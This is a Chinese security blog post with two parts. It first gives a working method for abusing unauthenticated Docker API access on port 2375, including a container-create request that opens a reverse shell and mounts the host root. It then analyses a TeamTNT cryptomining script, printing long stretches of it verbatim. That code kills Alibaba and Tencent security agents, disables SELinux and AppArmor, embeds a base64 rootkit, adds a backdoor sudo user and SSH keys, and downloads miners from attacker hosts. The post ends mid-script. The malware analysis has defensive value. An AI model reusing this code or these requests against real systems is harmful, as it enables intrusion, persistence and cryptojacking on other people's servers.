记一次寻找docker未授权新的利用方式结果变成样本分析这件事 - FA1C0N

admin 2021年12月31日15:11:45评论79 views字数 24583阅读81分56秒阅读模式

前言

了解过docker容器安全的大佬们应该知道docker的2375端口是存在未授权安全问题的,前段时间在我们团队推进云安全知识的时候,无意间在zoomeye发现TEAMTNT针对阿里云和腾讯云专门写的一个恶意挖矿脚本。鉴于这个样本还是写的挺有意思的不是二进制文件所以相对水一点,所以我们简略的分析胡乱猜测了一下TEAMTNT是如何利用2375端口恶意挖矿和后续的初步内网渗透过程。

Docker 2375利用方式

传统的利用方式通过-H tcp://ip:2375远程连进未授权的docker api,然后重新run一个新的实例。

再借助-v /:/mnt将物理服务器的根目录挂载到实例中,然后把ssh公钥写入物理服务器的/root/.ssh/authorized_keys文实现提权,或者将反弹shell的脚本写入/etc/crontab提权。

那有没有更骚费劲的操作呢?答案是有的。docker api本身是个http服务,官方的文档中有多种操作可以实现新建一个镜像。

这里借用了phith0n大佬之前的容器与云的碰撞——一次对 MinIO 的测试一文中的思路,我们翻阅了一下官方的文档,找到了一种利用docker api在不影响生产环境下的稳定反弹shell且能mount主目录的一个api /containers/create

/containers/create传递的参数中有我们很熟悉Cmd,Tty,Binds参数,跟run命令基本可以做到一一对照。

POST /containers/create HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 579
Connection: close
Upgrade-Insecure-Requests: 1

{
  "Hostname": "",
  "Domainname": "",
  "User": "",
  "AttachStdin": false,
  "AttachStdout": true,
  "AttachStderr": true,
  "Tty": true,
  "OpenStdin": false,
  "StdinOnce": false,
  "Detach": true,
  "Image": "ubuntu:latest", #使用的基础镜像
  "Cmd":  ["/bin/bash", "-c", "bash -i>& /dev/tcp/ip/port 0>&1;while true;do echo hello world;sleep 1;done"], #创建启动命令
  "Labels": {
    "com.example.vendor": "Acme",
    "com.example.license": "GPL",
    "com.example.version": "1.0"
  },
  "HostConfig": {
            "Binds": [
                "/:/mnt" #挂载根目录到mnt下
            ]
  }
}

虽然这个跟run命令参数很想,但Image参数如果是本地不存在依旧无法成功创建,因此我们需要创建一个镜像出来,用/images/create远程拉一个下来。(实战环境中也可以直接用已经存在的镜像)

curl -X POST "http://ip/images/create?fromImage=ubuntu&tag=latest"

最后用/containers/{id}/start启动刚才用ubuntu创建的实例

curl -X POST "http://ip/containers/{id}/start"

完美,现在我们能愉悦的继续从传统的攻击流程继续了。

样本分析

回到正题,鉴于TEAMTNT也没有故意隐藏自己的ip,因此不好确定他们使用哪种方式利用的docker api未授权漏洞,但来都来了,送上门的样本还是要分析到底的,顺便也研究一下他们的进攻思路。

从我们收集到的样本脚本中,TEAMTNT会先在创建的docker容器下载的cronb.sh脚本,然后其在部署挖矿环境后会继续下载和运行剩余的两个扫描脚本,脚本主要作用如下:

  1. cronb.sh
    • 剔除保护:停用相关云安全检测工具
    • 结束其他挖矿程序
    • 修改系统设置
    • 安装挖矿软件,挖门罗币
    • 终止自己的挖矿进程
    • 实现免密登录
    • 下载后续脚本cronis.sh
  2. cronis.sh
    • 下载软件依赖,安装pnscan,masscan
    • 安装cronscan并执行
  3. cronscan
    • 启动扫描器并下载cronrs.sh
  4. cronrs.sh
    • 运行扫描器查找内网和部分腾讯云及阿里云ip段的redis未授权漏洞扩大攻击范围

样本分析——cronb.sh

剔除阿里云的保护机制

stop_aegis_pkill()

stop_aegis_pkill(){
    pkill -9 AliYunDun >/dev/null 2>&1
    pkill -9 AliHids >/dev/null 2>&1
    pkill -9 AliHips >/dev/null 2>&1
    pkill -9 AliNet >/dev/null 2>&1
    pkill -9 AliSecGuard >/dev/null 2>&1
    pkill -9 AliYunDunUpdate >/dev/null 2>&1

    /usr/local/aegis/AliNet/AliNet --stopdriver
    /usr/local/aegis/alihips/AliHips --stopdriver
    /usr/local/aegis/AliSecGuard/AliSecGuard --stopdriver
    printf "%-40s %40s\n" "Stopping aegis" "[  OK  ]"
}

remove_aegis()

AEGIS_INSTALL_DIR="/opt/aegis"
#aegis:阿里云云服务器安骑士
remove_aegis(){
if [ -d "${AEGIS_INSTALL_DIR}" ];then
    umount ${AEGIS_INSTALL_DIR}/aegis_debug
    rm -rf ${AEGIS_INSTALL_DIR}/aegis_client
    rm -rf ${AEGIS_INSTALL_DIR}/aegis_update
    rm -rf ${AEGIS_INSTALL_DIR}/alihids
    rm -rf ${AEGIS_INSTALL_DIR}/globalcfg/domaincfg.ini
fi
}

uninstall_service()

uninstall_service() {

   if [ -f "/etc/init.d/aegis" ]; then
        /etc/init.d/aegis stop  >/dev/null 2>&1
        rm -f /etc/init.d/aegis 
   fi

    if [ $LINUX_RELEASE = "GENTOO" ]; then
        rc-update del aegis default 2>/dev/null
        if [ -f "/etc/runlevels/default/aegis" ]; then
            rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
        fi
    elif [ -f /etc/init.d/aegis ]; then
         /etc/init.d/aegis  uninstall
        for ((var=2; var<=5; var++)) do
            if [ -d "/etc/rc${var}.d/" ];then
                 rm -f "/etc/rc${var}.d/S80aegis"
            elif [ -d "/etc/rc.d/rc${var}.d" ];then
                rm -f "/etc/rc.d/rc${var}.d/S80aegis"
            fi
        done
    fi

}

剔除阿里云监控插件

if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
  /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor  
else
  export ARCHD=amd64
  if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} ]; then
    /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} uninstall && rm -rf /usr/local/cloudmonitor 
  else
    echo "ali cloud monitor not running"
  fi
fi

剔除腾讯云的保护机制

elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

停用linux两大安全机制,SElinux和apparmor

定义变量MOxmrigMOD和MOxmrigSTOCK,其实是xmrig。定义配置文件url和miner的url,还有两个备份文件,钱包地址和恶意脚本版本。

setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service


MOxmrigMOD=http://112.253.11.38/mid.jpg
MOxmrigSTOCK=http://112.253.11.38/mid.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.jokerd
VERSION=2.9

安装Diamorphine用以隐藏进程和提权

将文件提前base64编码放入bash脚本,之后再输出成tar包解压安装

function installdia(){

DIA_TAR='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'

chattr -ia / /etc/ /tmp/ /var/ /var/tmp/ 2>/dev/null
chattr -R -ia /tmp/ /var/tmp/ 2>/dev/null
chmod 1777 /tmp/ /var/tmp/ 2>/dev/null


if type yum 2>/dev/null 1>/dev/null; then yum clean all ; yum -y install gcc make kmod elfutils-libelf-devel; yum -y install "kernel-devel-uname-r == $(uname -r)" ; fi
if type apt 2>/dev/null 1>/dev/null; then apt update --fix-missing ; apt-get -y install gcc make kmod libelf-dev libelf-devel; apt-get -y install linux-headers-$(uname -r)  ; fi
if type apk 2>/dev/null 1>/dev/null; then apk update 2>/dev/null 1>/dev/null; apk add linux-headers 2>/dev/null ; fi

if [ ! -d "/var/tmp/.../dia/" ]; then mkdir -p /var/tmp/.../dia/ ; fi
echo $DIA_TAR | base64 -d > /var/tmp/.../dia/dia.tar.gz
tar xvf /var/tmp/.../dia/dia.tar.gz -C /var/tmp/.../dia/
rm -f /var/tmp/.../dia/dia.tar.gz
cd /var/tmp/.../dia/
make
}

实现免密登录

function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL [email protected]"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd; 
grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd; 
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow; 
grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow; 
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers; 
grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers; 
grep -q hilde /etc/sudoers || echo 'hilde  ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers

mkdir /home/hilde/.ssh/ -p  
touch /home/hilde/.ssh/authorized_keys  
touch /home/hilde/.ssh/authorized_keys2  
chmod 600 /home/hilde/.ssh/authorized_keys
chmod 600 /home/hilde/.ssh/authorized_keys2
grep -q [email protected] /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p  
touch /root/.ssh/authorized_keys  
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q [email protected] /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys; 
grep -q [email protected] /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys; 
grep -q [email protected] /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q [email protected] /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2; 
grep -q [email protected] /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2; 
grep -q [email protected] /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}

测试ssh连通性,包括测试加密功能,登录认证功能,登录认证是否为root,如果失败则报错,成功则不输出,这边有些奇奇怪怪的cur之类的命令,在下一个脚本样本中有讲

function checksshkeys(){
if [ -f /var/tmp/.system/[ext4].log ]; then
curl  http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
else 
curl  http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
fi
cat /home/hilde/.ssh/authorized_keys|grep [email protected] >/dev/null
if (test $? -ne 0); then
curl  http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
else
curl  http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
fi

cat /root/.ssh/authorized_keys|grep [email protected] >/dev/null
if (test $? -ne 0); then
curl  http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
else
curl  http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
fi
}

下载门罗币挖矿相关并测试运行结果

function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
  echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
fi

echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
  echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
chmod +x $MOHOME/\[ext4\]
rm /tmp/xmrig.tar.gz

echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
$MOHOME/[ext4] --help >/dev/null
if (test $? -ne 0); then
  if [ -f $MOHOME/[ext4] ]; then
    echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
  else 
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
  fi

  echo "[*] Looking for the latest version of Monero miner"
  #LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest  | grep -o '".*"' | sed 's/"//g'`
  LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK

  echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
  if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
  fi

  echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
  if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
    echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
  fi
  rm /tmp/xmrig.tar.gz
chmod +x $MOHOME/\[ext4\]

  echo "[*] Checking if stock version is OKAY!"
  $MOHOME/[ext4] --help >/dev/null
  if (test $? -ne 0); then 
    if [ -f $MOHOME/[ext4] ]; then
      echo "ERROR: Stock version of $MOHOME/[ext4] is not functional too"
    else 
      echo "ERROR: Stock version of $MOHOME/[ext4] was removed by antivirus too"
    fi
    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
  fi
fi

echo "[*] $MOHOME/[ext4] is OK"
}

TEAMTNT黑产团队标志

######################### printing greetings ###########################
clear
echo -e " "
echo -e "                                \e[1;34;49m___________                 _____________________________\033[0m"
echo -e "                                \e[1;34;49m\__    ___/___ _____    ____\__    ___/\      \__    ___/\033[0m"
echo -e "                                \e[1;34;49m  |    |_/ __ \\__  \  /     \|    |   /   |   \|    |   \033[0m"
echo -e "                                \e[1;34;49m  |    |\  ___/ / __ \|  Y Y  \    |  /    |    \    |   \033[0m"
echo -e "                                \e[1;34;49m  |____| \___  >____  /__|_|  /____|  \____|__  /____|   \033[0m"
echo -e "                                \e[1;34;49m             \/     \/      \/                \/         \033[0m"
echo -e " "
echo -e "                                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "
echo -e " "
echo -e "                                \e[1;34;49m            Now you get, what i want to give... --- '''      \033[0m"
echo " "
echo " "

检查运行的前提条件

钱包地址长度、运行环境配置、是否存在curl命令,前期下载的配置文件和其他软件,若没有就执行SetupMoneroOcean1函数;提前设置好配置文件,替换矿池等,控制CPU使用率

# checking prerequisites

if [ -z $WALLET ]; then
  echo "ERROR: wallet"
fi

WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
  echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
fi

if [ -z $MOHOME ]; then
  echo "ERROR: Please define HOME environment variable to your home directory"
fi

if [ ! -d $MOHOME ]; then
  echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
  echo '  export HOME=<dir>'
fi


if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
fi

sleep 2
$MOHOME/[ext4] --help >/dev/null
if (test $? -ne 0); then
    SetupMoneroOcean1
else
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi

if [ -f "$MOHOME/[ext4].pid" ]
 then
         echo "config file exists, neednot backup"
 else
         echo "config file not exists.download from teamtnt"
         SetupMoneroOcean1
fi


if [ -f "$MOHOME/[ext4]" ]
 then
         echo "miner file exists"
 else
         curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig  $MOHOME/\[ext4\]
fi

if [ -f "$MOHOME/[ext4].pid" ]
then
    echo "miner config exists"
else
    curl -L --progress-bar $config_url -o  $MOHOME/\[ext4\].pid
fi

rm /tmp/xmrig.tar.gz

if [ -f "$MOHOME/[ext4]" ]
 then
         echo "miner file exists, neednot backup"
 else
